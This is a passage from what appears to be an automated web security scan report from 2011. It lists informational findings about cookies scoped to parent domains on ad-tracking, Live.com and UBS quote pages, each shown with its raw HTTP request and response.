qOumNlV2+hZdOFDufJYnljwvpq71XenTeHqd48spMzFnpicVLPbpr6F9JquaL+8hRDXBuYuzDalJb3GsYRv5xNMf7DgYmhbimLb+MwquVtUWlZie2J/HUpZTu36b+zZhgvJil85VuhlcMT7r36YL1cJ8oFoe9XLgNv8E1K7TmXUCZE6d1JFsJ4pj9kovpSNG9dM4Qv9PqovOzgb6j/I4tqXmswn3t8CExhAUgGgXhF64lqdNn/A9CuvtxlLkrn7I+u9N0UzefZCt6ZEljlSRNdb56LZU/ZtJm5B0NWWIFg==; udm_0=MLv3NzMJZjpn3hepL5u85DdJSwnsJulKw7GjhUc66G1t5sARqqsaA7LZsKuuAdTsr767GbQcHDkWCrTmeWLtWp6yJz762TB1UwcjeHZXUyd9djFNJcLio30yxF0HHJw8BhRaZV09XADuFryc7t6F+RKBP1VaY7UwWUB6Hqw/8hvNvCj0P2aI5BUiVaG+ymma61YZrZ6cNi/7+BUP0nU3S/7aDey8pNKbTFe5PtnGelVZx+7RzWne/EK0Hqzvg/cAt24xuyuQiRcU+otjq8L91/vhBet19A0gHxTyU8bHnQxFZQGXBELihm7JUcNFWfDqL5oCOH9CkkBF/VWGyJdwtLmAAMBzOVpAH5rEQxhhn0ldtQhNKu95VbXaqi9Hy7HcpaYFFAG0gZBby/Ino2ND/TX6tyQ5BZVEmjC+vrBUCdi5gDjg8vCrIq6mOhXIxsr1rgP8VqKRS2482lJZLRiYVHVavyAnmm0xR9AiAdeo7Ulq59C1wDZnxwfvLEeBAQQvJD4UAZPMnAWC71qNBnXlSwn6B+iu+W0enrMzUh+pt/42W3ZyHY6wPL0wN55ZpdBoj2pz9x8DZxFJC8/0xAJN9asAv63LYh4pP2tKYCBkV7sKBfAVfyGLdNX/pP4+LEd7PMBqXJitqkzbF9+MLaphweZ3TkcNlE7FaGnjxQPdRypua7cLagU/pdcDVheJzU1Qpv5fnqo9hEcP5pXLebWRI35fOi6VMBuXnQHASM+ZvmIW7roY6dkcDDEPcSnE/eVzUk1c/p+XX0Gk0keWgb40WTFsa/iaQB6LydhfqaYhZGfvb7xoznGXYdL5IifgNcFokjWzep4hkl8kRRTKjBctzuSV0dfTjVJqWlkVn7ojPnTBtr7nvJyfyXssvc/oZPEKn6xtEkyP+huheQDpHwPE81CoOtg/xxDXS0cNluwSTrrZ/tcX/xM4VOQR6XJV7wiNgHj3COP52BgkFWuYCBWpp1Ij5FPQMSbt7pTH2c7UBstZHYsg3GEOgYj0QEAQUa+Gg3z/6YHY+hyOzKt+cCLpId3IuTquVU751kovG4jfZSDMngJEtub6vIo6aw9Ns/MIKRJThup9RJD3VB7EqUTygRfVC30WTM3yC/zCJcQvarkTIoqam+R1D4GnO60sxQIS+e/mX1w/KtPS81kyXN6TiaVQ7uglYyqBXtk/zz0qF6qzFm//Nv417kCWRG0/vOhqEU/d8q3yrAyqHEYTSMmgweeGAIN90FXwo5jDGblHJSyXqxHWV9tUDHtz1PxpJxB1N8GXbFB5TYAQUhQ7vJg7adz9jm8rfw8Y7beMhj+wZIuYSnRxUzpmUnS6ofeg1QUuC+Z3qf9S7L5SQNszvtcoLBc9Ah719T7f1ysEtywa9Vsd4Wwjl8zKCUqlK6pTR5hWwZKA/2vTlMW5KP8nlUJA0ghGLgKo0mw7K7ldIJDGgt35+98A8BFGuHkaYpjyQv6K3yw7I7DTxyaHys5L8nH5kQAKN3bYKYwjlWBp2N1SgUMI3nI+Cog1m4pF8d9z9xmgld2nyHHdFPNPN6cMyv5q95UqaeXKbbMoW1DWCZyaRTxpTpUv59jUkNuIfK24AUjxGeDuhOr8H5iJ6Jed0O3F4r/0YCsGYGJOx3YXtvXWHgws0N2UBQmJKmxDEOOnMYBplTFEsCuxSiua6b4/y40n8k3S4Svj/LU8Vywx/GY+KvqWkJzzM2QF2z2NaZngQD+ZUuVILb/zzsLyvu+vzkGfYcxC8/Dtr0TTpC57iD72sgltU1Tbp82Kl9OoNo7MKHvxORyvpLnM+wk+V9gxpSUMn3U+jtQ+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k9BuXIMH/AtZKgq+tBdHBVM7RYjwSPPC3FVLQFwFuMWG8EbAQsYoI8OaV7WOPjhx2CPcf9OpsZ48ffhgxUKwuHNdaG23oxgOxz4a2BAp5KnJ3kxYWukGTD9NHDu8HXg48nFrD79wjk7auuMDaF0MDEpTr5tMmmNUq38rgsEW4ayA8sCri2difrlqs/ene9+0qYeAfsmIqFs+0h9eFw838xg8/lCR7F0cH8rBUq6YU/9uihuCUcdFDV0an6kUaJ3sBvD3Tkfvy3EISMZa1zqUadhdbND+xUJZWqZWdDr+HWh2QBujcRipZlNYvBhOgEDd3F3DGEKvxZpcwjaLytiu147VLpmewyyiidQoXqce5lKaJk9S7G0XA2JVhoBTiP98/BwqSgIAxs3Z0Zi8eNprpTgeQ+w6Kn7LwNms9soA9Dpsu9og1qQJHB4aseZew+aew5y/ZNYSeIi9cIoxIcsNpQztLdBXXmvC925sWanqfyt8IXbY+LsTOEuFvoxYXAOrMbmM0uFHlGV5PS3E2KKr3EzPWWlX7+RPpv7E7R7U/TEbe0NpiODIG/uPEhR8i9pAEQMKLzhnNI654bV3jfWPCG43Y3UD9Zx10dgLTz3jCnBdPlX/DnObvK3St53/AcO5JCK4ne1hUKbVROkiYw1rfHnvjCM1/MNSlt0upkZwyZlOTkZ69diDWW+QyGqCV3/WgLueQXvOx1RQft/4PPBhoKMH0stGdjEWSwWevbrP9hM2WQ1vCvztSZZTB6+LNnXp3BZhTHV; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
Set-Cookie: rtc_N0S3=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.30. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1794506331;fpan=0;fpa=P0-399196261-1309960828609;ns=0;url=http%3A%2F%2Ftechflash.com%2Fabout.html;ref=http%3A%2F%2Ftechflash.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1309960851219;tzo=300;a=p-b1m9DYkJHhIgg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EE0ACvaeApllAacBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0dpKRrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/7111//82F1/
Set-Cookie: d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: QS


9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-5eu58oSpL1cEs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-5eu58oSpL1cEs.gif?labels=_fp.channel.Beauty+of+the+Web,_fp.event.All+Content HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EO8AFPaeApll_6ixz4EBrAEBlAeB1Q4eqT0eThocKRkoxJavgQCIEACWCmAObyviDOFdHhDRDhDRmS5bkrFrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q; expires=Tue, 04-Oct-2011 15:39:02 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Wed, 06 Jul 2011 15:39:02 GMT
Server: QS

GIF89a.......,.................D..;

9.32. http://profile.live.com/badge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft+News+Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png HTTP/1.1
Host: profile.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; sc_clustbl_142=6725091ecd4325b02:nK2egy9F4YAy3X0iJIsk4gWz/TnLERdzTYsLBI8gS4dY1I1zZH7VdzxoWPietMFwJ+QtJqQopIgEEkfF8AtEkdCRD5CVTskP/DRQUugWImwwVCCEmH0dJyGBA/G61wU3f520yqTm46/CX4/Eyo6aSA==; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950981&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1
Server: Microsoft-IIS/7.5
X-Imf: 8b22b2cd-4263-44ba-aaeb-e42b091bf16a
Set-Cookie: E=P:bOIwReUJzog=:+1yDfpFa5Q6cY2Ra7+2GtI6CZeM5y7anIF6uyN3OFUc=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: SABadge=msg=&url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft%20News%20Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png&ctype=link&swfurl=&height=&width=&emv=; expires=Thu, 07-Jul-2011 11:16:21 GMT; path=/Badge/
Set-Cookie: sc_clustbl_142=d751af858b13d51f; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC667 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Content-Length: 314

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1309950981&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

9.33. https://quotes-public.ubs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public.ubs.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/home HTTP/1.1
Host: quotes-public1.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com; Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:52:26 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:06:32 GMT; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/legChooseDomicile
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/de

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/de HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:51 GMT
Server: Apache
Set-Cookie: ubslang=de-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=wwy/bl/536LcaMPi7GA/Za5JB+9u0vIfbxz1PWDLCjlHhr4eOK5kCvNkSrvKkTm5roTeIgMCGhY-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/en

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/en HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:53 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=6G2OGI4Mofoqm3Bjc1IRFE50rP8F7k2B0jFsSxftOEdoQcPDAFecRqYUR7Aq9MgK2AOPyJpTcGA-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/fr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/fr HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=fr-CH; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=Wyg33L33zBKvKRR1J07MC3T0k3Ho/EjMtEtx3rdubNAr32qz8nf8xwGoImu5je3zV/T53mEjDdg-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/it

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/it HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=it-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=tyKPlvE7DsLkcB09TcOGFUhMhpU2+qTbpNwNpzilJDEKEJ4haF5DeoAANdBD35geyk8nTgKuvAI-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.39. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

